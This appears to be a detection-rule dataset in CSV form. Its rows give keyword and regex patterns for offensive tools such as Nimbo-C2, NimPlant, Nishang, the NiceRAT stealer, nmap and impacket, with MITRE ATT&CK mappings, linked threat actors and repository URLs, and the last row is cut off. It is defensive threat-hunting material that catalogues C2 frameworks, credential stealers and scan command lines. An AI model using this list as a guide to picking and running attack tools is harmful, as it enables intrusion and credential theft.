"*nimbo_root*",".{0,1000}nimbo_root.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53399" "*Nimbo-C2 w1ll r0ck y0ur w0rld*",".{0,1000}Nimbo\-C2\sw1ll\sr0ck\sy0ur\sw0rld.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53400" "*Nimbo-C2*",".{0,1000}Nimbo\-C2.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53401" "*Nimbo-C2.*",".{0,1000}Nimbo\-C2\..{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53402" 
"*nimbo-dependencies*",".{0,1000}nimbo\-dependencies.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","53403" "*nimbuspwn.py*",".{0,1000}nimbuspwn\.py.{0,1000}","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","1","#linux","N/A","N/A","1","22","7","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z","53404" "*nimcrypt -*",".{0,1000}nimcrypt\s\-.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","53405" "*nimcrypt --file *",".{0,1000}nimcrypt\s\-\-file\s.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","N/A","1","98","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z","53406" "*nimcrypt.nim*",".{0,1000}nimcrypt\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader 
Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","53407" "*NimDllSideload-main*",".{0,1000}NimDllSideload\-main.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","53408" "*NimExec.exe*",".{0,1000}NimExec\.exe.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","53409" "*NimExec-master*",".{0,1000}NimExec\-master.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","53410" "*NimPackt.py -i *",".{0,1000}NimPackt\.py\s\-i\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","53411" "*NimPlant v*",".{0,1000}NimPlant\sv.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black 
Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53412" "*nimplant-*",".{0,1000}nimplant\-.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53413" "*NimPlant*.tar.gz*",".{0,1000}NimPlant.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53414" "*NimPlant*.zip*",".{0,1000}NimPlant.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53415" "*nimplant.db*",".{0,1000}nimplant\.db.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53416" "*NimPlant.dll*",".{0,1000}NimPlant\.dll.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53417" 
"*NimPlant.nim*",".{0,1000}NimPlant\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53418" "*NimPlant.nimble*",".{0,1000}NimPlant\.nimble.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53419" "*NimPlant.py*",".{0,1000}NimPlant\.py.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53420" "*nimplantPrint*",".{0,1000}nimplantPrint.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53421" "*nimplants-*.js*",".{0,1000}nimplants\-.{0,1000}\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53422" "*nimplants.html*",".{0,1000}nimplants\.html.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 
- TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53423" "*NimShellCodeLoader*",".{0,1000}NimShellCodeLoader.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","53426" "*NimSyscallLoader -*",".{0,1000}NimSyscallLoader\s\-.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","53427" "*Ninja c2*",".{0,1000}Ninja\sc2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","53428" 
"*ninjac2*",".{0,1000}ninjac2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","53429" "*nipe.pl *",".{0,1000}nipe\.pl\s.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway. Tor enables users to surf the internet. chat and send instant messages anonymously. and is used by a wide variety of people for both licit and illicit purposes. Tor has. for example. been used by criminals enterprises. hacktivism groups. and law enforcement agencies at cross purposes. sometimes simultaneously. Nipe is a script to make the Tor network your default gateway.This Perl script enables you to directly route all your traffic from your computer to the Tor network through which you can surf the internet anonymously without having to worry about being tracked or traced back.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","N/A","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","53430" "*nircmdc.exe savescreenshot*",".{0,1000}nircmdc\.exe\ssavescreenshot.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53433" "*nirsoft.net/utils/browsing_history_view.html*",".{0,1000}nirsoft\.net\/utils\/browsing_history_view\.html.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - 
T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53436" "*nishang.exe*",".{0,1000}nishang\.exe.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53437" "*nishang.ps1*",".{0,1000}nishang\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53438" "*nishang.psm1*",".{0,1000}nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53439" "*Nishang.psm1*",".{0,1000}Nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53440" "*nishang.psm1*",".{0,1000}nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53441" "*nishang-0-3-4.html*",".{0,1000}nishang\-0\-3\-4\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53442" "*Nishang-all-in-one*",".{0,1000}Nishang\-all\-in\-one.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","53443" "*NixImports by dr4k0nia*",".{0,1000}NixImports\sby\sdr4k0nia.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","53445" "*NixImports.csproj*",".{0,1000}NixImports\.csproj.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","53446" "*NixImports.exe*",".{0,1000}NixImports\.exe.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","53447" 
"*NixImports.git*",".{0,1000}NixImports\.git.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","53448" "*NixImports.sln*",".{0,1000}NixImports\.sln.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","53449" "*nixpal/shellsilo*",".{0,1000}nixpal\/shellsilo.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - T1546.015","TA0005 - TA0042","N/A","N/A","Resource Development","https://github.com/nixpal/shellsilo","1","1","N/A","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","53450" "*nkbihfbeogaeaoehlefnkodbefgpgknn*",".{0,1000}nkbihfbeogaeaoehlefnkodbefgpgknn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53452" "*nkddgncdjgjfcddamfgcmfnlhccnimig*",".{0,1000}nkddgncdjgjfcddamfgcmfnlhccnimig.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53453" "*nlbmnnijcnlegkjjpcfjclmcfggfefdm*",".{0,1000}nlbmnnijcnlegkjjpcfjclmcfggfefdm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53455" "*nmake inject_local *",".{0,1000}nmake\sinject_local\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","53468" "*nmap *--script *",".{0,1000}nmap\s.{0,1000}\-\-script\s.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Discovery","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53471" "*nmap -Pn -p* --open -T4 -n -oG - * 2>/dev/null | grep -F 
Ports*",".{0,1000}nmap\s\-Pn\s\-p.{0,1000}\s\-\-open\s\-T4\s\-n\s\-oG\s\-\s.{0,1000}\s2\>\/dev\/null\s\|\sgrep\s\-F\sPorts.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","53473" "*nmap -T3 -sT -Pn -n --open -p135 -oG -*",".{0,1000}nmap\s\-T3\s\-sT\s\-Pn\s\-n\s\-\-open\s\-p135\s\-oG\s\-.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","53475" "*nmap/ncrack*",".{0,1000}nmap\/ncrack.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","53477" "*nmap_port_scanner.py*",".{0,1000}nmap_port_scanner\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","53478" "*nmap_port_scanner_ip_obj.py*",".{0,1000}nmap_port_scanner_ip_obj\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - 
TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","53479" "*nmap_smb_scan_custom_*.txt*",".{0,1000}nmap_smb_scan_custom_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","53480" "*nmapAnswerMachine.py*",".{0,1000}nmapAnswerMachine\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","53481" "*nmap-reverse-lookup*",".{0,1000}nmap\-reverse\-lookup.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","53483" "*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*",".{0,1000}nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","N/A","10","10","17","3","2024-10-09T15:36:46Z","2023-04-28T01:58:18Z","53484" "*No cached domain password found!*",".{0,1000}No\scached\sdomain\spassword\sfound!.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","53485" "*No credentials supplied* looking for null session shares!*",".{0,1000}No\scredentials\ssupplied.{0,1000}\slooking\sfor\snull\ssession\sshares!.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral 